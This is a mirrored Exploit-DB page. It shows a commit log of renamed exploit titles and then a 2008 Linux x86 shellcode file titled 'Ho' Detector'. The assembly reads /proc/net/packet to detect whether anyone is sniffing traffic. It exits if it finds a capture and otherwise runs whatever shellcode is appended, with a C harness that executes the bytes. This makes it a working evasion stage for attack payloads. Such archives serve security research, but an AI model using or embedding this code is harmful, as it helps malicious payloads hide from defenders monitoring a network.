bpmcdevitt/exploit-db-mirror
1
0
Fork 0
Code Issues Pull requests Projects Releases Packages Wiki Activity Actions
exploit-db-mirror/platforms/lin_x86/shellcode/13332.c
Offensive Security 477bcbdcc0 DB: 2016-03-17 
5 new exploits

phpMyNewsletter <= 0.8 (beta5) - Multiple Vulnerability Exploit
phpMyNewsletter <= 0.8 (beta5) - Multiple Vulnerabilities

My Book World Edition NAS Multiple Vulnerability
My Book World Edition NAS - Multiple Vulnerabilities

Katalog Stron Hurricane 1.3.5 - Multiple Vulnerability RFI / SQL
Katalog Stron Hurricane 1.3.5 - (RFI / SQL) Multiple Vulnerabilities

cmsfaethon-2.2.0-ultimate.7z Multiple Vulnerability
cmsfaethon-2.2.0-ultimate.7z - Multiple Vulnerabilities

DynPG CMS 4.1.0 - Multiple Vulnerability (popup.php and counter.php)
DynPG CMS 4.1.0 - (popup.php and counter.php) Multiple Vulnerabilities

Nucleus CMS 3.51 (DIR_LIBS) - Multiple Vulnerability
Nucleus CMS 3.51 (DIR_LIBS) - Multiple Vulnerabilities

N/X - Web CMS (N/X WCMS 4.5) Multiple Vulnerability
N/X - Web CMS (N/X WCMS 4.5) - Multiple Vulnerabilities

New-CMS - Multiple Vulnerability
New-CMS - Multiple Vulnerabilities

Edgephp Clickbank Affiliate Marketplace Script Multiple Vulnerability
Edgephp Clickbank Affiliate Marketplace Script - Multiple Vulnerabilities

JV2 Folder Gallery 3.1.1 - (popup_slideshow.php) Multiple Vulnerability
JV2 Folder Gallery 3.1.1 - (popup_slideshow.php) Multiple Vulnerabilities

i-Gallery - Multiple Vulnerability
i-Gallery - Multiple Vulnerabilities

My Kazaam Notes Management System Multiple Vulnerability
My Kazaam Notes Management System - Multiple Vulnerabilities

Omnidocs - Multiple Vulnerability
Omnidocs - Multiple Vulnerabilities

Web Cookbook Multiple Vulnerability
Web Cookbook - Multiple Vulnerabilities

KikChat - (LFI/RCE) Multiple Vulnerability
KikChat - (LFI/RCE) Multiple Vulnerabilities

Webformatique Reservation Manager - 'index.php' Cross-Site Scripting Vulnerability
Webformatique Reservation Manager 2.4 - 'index.php' Cross-Site Scripting Vulnerability

xEpan 1.0.4 - Multiple Vulnerability
xEpan 1.0.4 - Multiple Vulnerabilities
AKIPS Network Monitor 15.37 through 16.5 - OS Command Injection
Netwrix Auditor 7.1.322.0 - ActiveX (sourceFile) Stack Buffer Overflow
Cisco UCS Manager 2.1(1b) - Shellshock Exploit
OpenSSH <= 7.2p1 - xauth Injection
FreeBSD 10.2 amd64 Kernel - amd64_set_ldt Heap Overflow
2016-03-17 07:07:56 +00:00

54 lines
No EOL
3.3 KiB
C
Executable file
Raw Blame History

/*
▐▄∙ ▄ ▄▄▄ . ▐ ▄ ∙ ▌ ▄ ·. ▄∙ ▄▌ ▄▄▄▄▄ ▄▄▄·
█▌█▌■ ▀▄.▀· ∙█▌▐█ ■ ·██ ▐███■ █■██▌ ∙██ ▐█ ▀█
·██· ▐▀▀■▄ ▐█▐▐▌ ▄█▀▄ ▐█ ▌▐▌▐█· █▌▐█▌ ▐█.■ ▄█▀▀█
■▐█·█▌ ▐█▄▄▌ ██▐█▌ ▐█▌.▐▌ ██ ██▌▐█▌ ▐█▄█▌ ▐█▌· ▐█ ■▐▌
∙▀▀ ▀▀ ▀▀▀ ▀▀ █■ ▀█▄▀■ ▀▀ █■▀▀▀ ▀▀▀ ▀▀▀ ▀ ▀
Ho' Detector (Promiscuous mode detector shellcode)
by XenoMuta <xenomuta[at]phreaker[dot]net>
http://xenomuta.tuxfamily.org/
This shellcode uses a stupid, yet effective method
for detecting sniffing on all interfaces in linux:
parsing /proc/net/packet, which contains libpcap's
stats and only one line (56 bytes) when not sniffing.
*/
char sc[]=
"\x66\x31\xC0" // xor eax,eax
"\x66\x50" // push eax
"\x66\x68\x63\x6B\x65\x74" // push dword 0x74656b63 ; cket
"\x66\x68\x74\x2F\x70\x61" // push dword 0x61702f74 ; t/pa
"\x66\x68\x63\x2F\x6E\x65" // push dword 0x656e2f63 ; c/ne
"\x66\x68\x2F\x70\x72\x6F" // push dword 0x6f72702f ; /pro
"\xB0\x05" // mov al,0x5 ; open()
"\x66\x89\xE3" // mov ebx,esp ; /proc/net/packet
"\x66\x31\xC9" // xor ecx,ecx ; O_RDONLY
"\xCD\x80" // int 0x80
"\x66\x93" // xchg eax,ebx
"\x6A\x03" // push byte +0x3 ; read()
"\x66\x58" // pop eax
"\x66\x89\xE1" // mov ecx,esp
"\x6A\x39" // push byte +0x39 ; at most 57 bytes
"\x66\x5A" // pop edx
"\xCD\x80" // int 0x80
"\x3C\x38" // cmp al,0x38 ; if only 56 bytes
"\x74\x06" // jz 0x40 ; there is no packet
"\x6A\x01" // push byte +0x1 ; capture. Proceed
"\x66\x58" // pop eax ; with shellcode
"\xCD\x80" // int 0x80 ; else, exit()
/*
Append your shellcode here
*/
"\x90";
main(){(*(void (*)()) sc)();}
-----BEGIN PGP SIGNATURE-----
iEYEARECAAYFAkkjGO0ACgkQ2LnNaOYR/B1h1QCg2uatkfAzSE5Jgc3bzJmFU/3s
opMAoLufSxvFoSNl3W+6h5rxmLIcq2Mp
=ISTU
-----END PGP SIGNATURE-----
// milw0rm.com [2008-11-18]
Reference in a new issue View git blame Copy permalink